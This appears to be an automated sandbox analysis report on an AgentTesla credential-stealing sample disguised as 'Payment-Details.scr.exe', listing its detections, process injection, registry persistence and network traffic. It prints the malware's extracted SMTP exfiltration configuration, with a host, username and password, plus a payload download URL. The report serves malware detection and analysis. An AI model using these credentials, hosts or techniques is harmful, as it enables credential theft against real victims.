Windows Analysis Report
Payment-Details.scr.exe

Overview

General Information

Sample name: Payment-Details.scr.exe
Analysis ID: 1495997
MD5: eee76d74368111c385e634a9f4f5a9cf
SHA1: 35a9afb88f649e243a1be654ef7aad6e5dafbce5
SHA256: 82ee5c8372f9bc8ac9cfac2833c19d238fa8a60fa32e6d27d9fc781d2e64dc25
Tags: exe
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Payment-Details.scr.exe (PID: 432 cmdline: "C:\Users\user\Desktop\Payment-Details.scr.exe" MD5: EEE76D74368111C385E634A9F4F5A9CF)
    • InstallUtil.exe (PID: 2332 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Fdimzk.exe (PID: 6012 cmdline: "C:\Users\user\AppData\Roaming\Fdimzk.exe" MD5: EEE76D74368111C385E634A9F4F5A9CF)
    • InstallUtil.exe (PID: 2740 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Fdimzk.exe (PID: 3228 cmdline: "C:\Users\user\AppData\Roaming\Fdimzk.exe" MD5: EEE76D74368111C385E634A9F4F5A9CF)
    • InstallUtil.exe (PID: 2852 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}
Source | Rule | Description | Author | Strings
00000003.00000002.2016324901.00000000023AE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000003.00000002.2016324901.0000000002381000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.2016324901.0000000002381000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
0.2.Payment-Details.scr.exe.7160000.11.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.Payment-Details.scr.exe.47efcb0.1.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
5.2.Fdimzk.exe.41206f0.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
5.2.Fdimzk.exe.41206f0.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
5.2.Fdimzk.exe.41206f0.2.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | Strings:
  • 0x322ef:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x32361:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x323eb:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x3247d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x324e7:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x32559:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x325ef:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3267f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\Fdimzk.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Payment-Details.scr.exe, ProcessId: 432, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Fdimzk
Source: Network Connection | Author: frack113 | Data: DestinationIp: 163.44.198.71, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 2332, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 62397
No Suricata rule has matched

AV Detection

Source: 3.2.InstallUtil.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}
Source: C:\Users\user\AppData\Roaming\Fdimzk.exe | ReversingLabs: Detection: 18%
Source: Payment-Details.scr.exe | ReversingLabs: Detection: 18%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Fdimzk.exe | Joe Sandbox ML: detected
Source: Payment-Details.scr.exe | Joe Sandbox ML: detected
Source: Payment-Details.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:62398 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:62401 version: TLS 1.2
Source: Payment-Details.scr.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.0000000004409000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000036C9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1690104428.0000000006690000.00000004.08000000.00040000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.0000000002A0A000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003797000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000003179000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.000000000403D000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.0000000004409000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000036C9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1690104428.0000000006690000.00000004.08000000.00040000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.0000000002A0A000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003797000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000003179000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.000000000403D000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Code function: 4x nop then jmp 063669F7h | 0_2_06366738
Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Code function: 4x nop then jmp 063669F7h | 0_2_06366728
Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Code function: 4x nop then jmp 063669F7h | 0_2_06366822
Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Code function: 4x nop then jmp 0723A582h | 0_2_0723A4E8
Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Code function: 4x nop then jmp 0723A582h | 0_2_0723A4F8
Source: C:\Users\user\AppData\Roaming\Fdimzk.exe | Code function: 4x nop then jmp 058469F7h | 4_2_05846738
Source: C:\Users\user\AppData\Roaming\Fdimzk.exe | Code function: 4x nop then jmp 058469F7h | 4_2_05846728
Source: C:\Users\user\AppData\Roaming\Fdimzk.exe | Code function: 4x nop then jmp 058469F7h | 4_2_05846822
Source: C:\Users\user\AppData\Roaming\Fdimzk.exe | Code function: 4x nop then jmp 0688A582h | 4_2_0688A4E8
Source: C:\Users\user\AppData\Roaming\Fdimzk.exe | Code function: 4x nop then jmp 0688A582h | 4_2_0688A4F8

Networking

Source: Yara match | File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Fdimzk.exe.382ec18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Fdimzk.exe.41206f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.8:62397 -> 163.44.198.71:587
Source: global traffic | HTTP traffic detected: GET /chmod%20permission%20777/panel/Uslmwziyya.vdf HTTP/1.1 Host: etehadshipping.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 163.44.198.71
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: Joe Sandbox View | ASN Name: GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: etehadshipping.com
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: nffplp.com
                    Source: unknown | Network traffic detected: HTTP traffic on port 62399 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 62398 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 62401 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 62400 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62398
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62399
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62400
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62401
                    Source: unknown | HTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:49704 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:62398 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:62401 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, POq2Ux.cs | .Net Code: mDt2FXita0Y
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

                    System Summary

                    Source: 5.2.Fdimzk.exe.41206f0.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                    Source: 4.2.Fdimzk.exe.382ec18.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                    Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                    Source: 4.2.Fdimzk.exe.382ec18.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                    Source: 5.2.Fdimzk.exe.41206f0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                    Source: initial sample | Static PE information: Filename: Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe | Static file information: Suspicious name
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Code function: 0_2_063621B8 NtProtectVirtualMemory,0_2_063621B8
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Code function: 0_2_063632B0 NtResumeThread,0_2_063632B0
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Code function: 0_2_063621B0 NtProtectVirtualMemory,0_2_063621B0
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Code function: 0_2_063632A8 NtResumeThread,0_2_063632A8
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe | Code function: 4_2_058421B8 NtProtectVirtualMemory,4_2_058421B8
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe | Code function: 4_2_058432B0 NtResumeThread,4_2_058432B0
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe | Code function: 4_2_058421B0 NtProtectVirtualMemory,4_2_058421B0
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe | Code function: 4_2_058432A8 NtResumeThread,4_2_058432A8
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000043B9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1691456068.0000000006F40000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameXzvnmbab.dll" vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1674818011.000000000144E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.0000000004409000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.0000000004409000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesURE-FILE.exe4 vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000000.1430433952.0000000000F84000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesURE-FILE.exe4 vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000033FD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000037C9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000036C9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1690104428.0000000006690000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXzvnmbab.dll" vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe | Binary or memory string: OriginalFilenamesURE-FILE.exe4 vs Payment-Details.scr.exe
                    Source: Payment-Details.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 5.2.Fdimzk.exe.41206f0.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.Fdimzk.exe.382ec18.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.Fdimzk.exe.382ec18.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.Fdimzk.exe.41206f0.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, cEMTeSTJCQwtXJPNZNI.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, ZTFEpdjP8zw.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, WnRNxU.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, 2njIk.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, I5ElxL.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, QQSiOsa4hPS.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, FdHU4eb83Z7.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, Task.cs | Task registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, TaskService.cs | Task registration methods: 'CreateFromToken'
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/2@3/3
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe | File created: C:\Users\user\AppData\Roaming\Fdimzk.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
                    Source: Payment-Details.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Payment-Details.scr.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Payment-Details.scr.exe | ReversingLabs: Detection: 18%
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe | File read: C:\Users\user\Desktop\Payment-Details.scr.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\Payment-Details.scr.exe "C:\Users\user\Desktop\Payment-Details.scr.exe"
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\Fdimzk.exe "C:\Users\user\AppData\Roaming\Fdimzk.exe"
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: rasman.dllJump to behavior
